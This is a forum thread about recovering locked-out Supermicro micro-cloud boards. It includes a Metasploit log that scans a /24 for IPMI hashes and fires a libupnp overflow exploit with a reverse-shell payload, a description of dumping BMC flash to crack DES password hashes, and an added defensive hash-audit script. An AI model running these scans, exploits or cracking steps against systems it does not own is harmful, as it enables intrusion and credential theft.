EU ebay: Supermicro X10SLE-F (Micro-Cloud node) usually under 10 Euro

RageBone

Active Member
Jul 11, 2017
@DanAnd
Another option would be to Metasploit the ipmi.
There are a few things you can do with that. The most time consuming would be to retrieve the hash of the password, which you'd need to crack.

If you have soldering skills and equipment, you could also swap the ROM that the IPMI is stored on.

nerdalertdk

Fleet Admiral
Mar 9, 2017
::1
Okay, bought the ones for the server but wanted 2u more, just didn't know what fits.


Edit: hmm, this one seems to fit

SNK-P0048PS
 

RageBone

Active Member
Jul 11, 2017
@DanAnd you should be able to get a list of users and the respective password hashes for them through Metasploit as a last resort.
Could crack those hashes : )
 

DanAnd

Member
Jul 25, 2016
Dortmund, Germany
www.danand.de
As said, the IPMI Version is pretty safe, so all attempts didn't work out:
Code:
       =[ metasploit v5.0.36-dev-                         ]
+ -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
+ -- --=[ 545 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use  auxiliary/scanner/ipmi/ipmi_version
msf5 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 146.0.33.0/24
RHOSTS => 146.0.33.0/24
msf5 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
[+] 146.0.33.34:623 - IPMI - IPMI-2.0 OEMID:4543232 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ipmi/ipmi_version) >
msf5 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 146.0.33.0/24
RHOSTS => 146.0.33.0/24
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run

[*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) >
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 146.0.33.0/24
RHOSTS => 146.0.33.0/24
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set THREADS 256
THREADS => 256
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[*] Scanned  27 of 256 hosts (10% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 149 of 256 hosts (58% complete)
[*] Scanned 225 of 256 hosts (87% complete)
[*] Scanned 230 of 256 hosts (89% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 246 of 256 hosts (96% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 254 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) >

       =[ metasploit v5.0.36-dev-                         ]
+ -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
+ -- --=[ 545 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/multi/upnp/libupnp_ssdp_overflow
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set RHOST 146.0.33.34
RHOST => 146.0.33.34
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set LHOST 146.0.33.1
LHOST => 146.0.33.1
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set PAYLOAD cmd/unix/reverse_openssl
PAYLOAD => cmd/unix/reverse_openssl
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploid
[-] Unknown command: exploid.
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploit

[*] Started reverse double SSL handler on 146.0.33.1:4444
[*] The system 146.0.33.34 did not reply to our M-SEARCH probe
[-] Exploit aborted due to failure: no-target: No compatible target detected
[*] Exploit completed, but no session was created.
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) >
 

DanAnd

Member
Jul 25, 2016
Dortmund, Germany
www.danand.de
So I did it the hard way:
I looked out for the BMC's flash chip, cleaned up the pins and used a chip grabber and SPI programmer to read out the flash.
This was pretty straightforward, but I had to use updated flashrom code, as the flash chip is a MX25L25635F, which was not included in the current Ubuntu Linux release I am using.
After figuring out the pin-outs, I connected GND, MISO, MOSI, CLK and CS, but left +3,3V open. Then I powered up the board and read everything from the flash chip into a file.

Looking into the flash image, I found the wsman configuration, which points to a simple_auth.passwd file, which consists of 4 password hashes ;-)
The encryption method used is pretty old: Traditional Unix Crypt (DES). That means the password is at most 8 characters long and the valid characters are 7-bit ASCII.

The first user is obvious: ADMIN with the hashed password of ADMIN.
Since ADMIN/ADMIN works neither in IPMItool nor on the web interface, I assume they have disabled that user, which is quite clever, as every script-kiddy will try the default usernames on IPMI interfaces.

So there are 3 hashes left. I'll give hashcat and my trusty Geforce 1060 GPU a try and hopefully figure out at least one password, so that I can do a factory reset. Then I can finally continue on my path to powering up this little mainboard :)

Cheers,

Daniel
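From the defender's side, the interesting part of the post above is what a dumped simple_auth.passwd tells you before any cracking happens: the hash scheme (traditional DES crypt caps passwords at 8 characters and uses a 12-bit salt), whether the vendor default account name still has a usable hash, and whether two accounts share the same hash (same salt and same password, so one crack opens both). The script below is an added example written for this thread; it is not Supermicro firmware code and not the poster's tooling. The "user:hash" line layout and every sample entry are constructed assumptions; the hash strings are made up and are not real credentials.

```python
"""Audit a BMC-style simple_auth.passwd dump for weak hash schemes and default accounts.

Added example for this thread, not Supermicro's code. The one "user:hash"
entry-per-line layout and all sample entries below are constructed assumptions.
"""
import re
from typing import NamedTuple

# Hash scheme signatures, checked in order. Traditional DES crypt has no
# "$id$" prefix: it is 2 salt chars + 11 hash chars from the crypt alphabet.
SCHEMES = (
    ("sha512crypt", re.compile(r"^\$6\$")),
    ("sha256crypt", re.compile(r"^\$5\$")),
    ("md5crypt", re.compile(r"^\$1\$")),
    ("descrypt", re.compile(r"^[./0-9A-Za-z]{13}$")),
)

# Account names vendors commonly ship enabled; ADMIN is the one seen in the thread.
DEFAULT_USERS = {"ADMIN", "admin", "root"}


class Finding(NamedTuple):
    user: str
    scheme: str
    issues: tuple


def classify(hash_value: str) -> str:
    """Return the scheme name for a crypt-style hash, or 'locked' / 'unknown'."""
    if hash_value in ("", "*", "!", "x"):
        return "locked"
    for name, pattern in SCHEMES:
        if pattern.match(hash_value):
            return name
    return "unknown"


def audit(text: str) -> list:
    """Parse user:hash lines and report weak schemes, default names and shared hashes."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, _, hash_value = line.partition(":")
        entries.append((user, hash_value))

    # Identical salt+hash means identical password: one crack opens several accounts.
    hash_owners = {}
    for user, hash_value in entries:
        hash_owners.setdefault(hash_value, []).append(user)

    findings = []
    for user, hash_value in entries:
        scheme = classify(hash_value)
        issues = []
        if scheme == "descrypt":
            issues.append("legacy DES crypt: password truncated to 8 chars, 12-bit salt, fast to brute force")
        elif scheme in ("md5crypt", "unknown"):
            issues.append(f"weak or unrecognised scheme: {scheme}")
        if user in DEFAULT_USERS and scheme != "locked":
            issues.append("vendor default account name still has a usable password")
        if scheme != "locked" and len(hash_owners[hash_value]) > 1:
            others = sorted(set(hash_owners[hash_value]) - {user})
            issues.append("hash shared with: " + ", ".join(others))
        findings.append(Finding(user, scheme, tuple(issues)))
    return findings


# Constructed sample dump (hash values are made up, not real credentials).
SAMPLE = """\
# user:hash
ADMIN:ab3rQ9kLmZ0p2
operator:ab3rQ9kLmZ0p2
service:$6$saltsalt$4r8u0ZkX6kXqTr4N9oZTzQF0FQpZ7kI8mPz5bbc0M2T1Q4z3C0l7X7X0z2bK3yL7Qb0F4Nv2Q1sR0pD7g3Zr1
guest:*
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.user:10} {f.scheme:12} " + ("; ".join(f.issues) or "ok"))
```

Run against a real dump, the useful output is the scheme column: any `descrypt` row means the account's password is in a search space of at most 8 printable characters regardless of what the user typed, which is the reason a BMC on a legacy scheme belongs on an isolated management network and not on a routable /24 like the one scanned above.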
 

Guillem

Member
Nov 13, 2017
So the issue is 'powering up' the server as in pressing the 'power on' button? It just stays on standby when you connect it? If that is the case, I bet there has to be a couple of pins you can short that are coming from the power distribution board that will power on the system. Either shorting them or pulling one up to 5V or down to ground.
 

DanAnd

Member
Jul 25, 2016
Dortmund, Germany
www.danand.de
So the issue is 'powering up' the server as in pressing the 'power on' button? It just stays on standby when you connect it? If that is the case, I bet there has to be a couple of pins you can short that are coming from the power distribution board that will power on the system. Either shorting them or pulling one up to 5V or down to ground.
That's exactly what I think will be the easiest way. I contacted Supermicro Support on it, but they have to all the SM HQ first.

There are basically just 8 thin data cables coming from the chassis to the mainboard.
 

Guillem

Member
Nov 13, 2017
So what happens when you press the power switch on the board? Does it even try to do something?
 

Guillem

Member
Nov 13, 2017
I imagined you did, but just in case :)

What I would suggest is to find, next to the thin cable connector on the motherboard, an IC for power control. A lot of times this is an ADMxxxx, which tends to be in a small package with somewhere between 16 and 30 pins. If you find that, I bet one of the pins is connected to the enable specified in the datasheet, so you will just need to figure out to which connector pin it's routed and provide the necessary voltage/GND.
 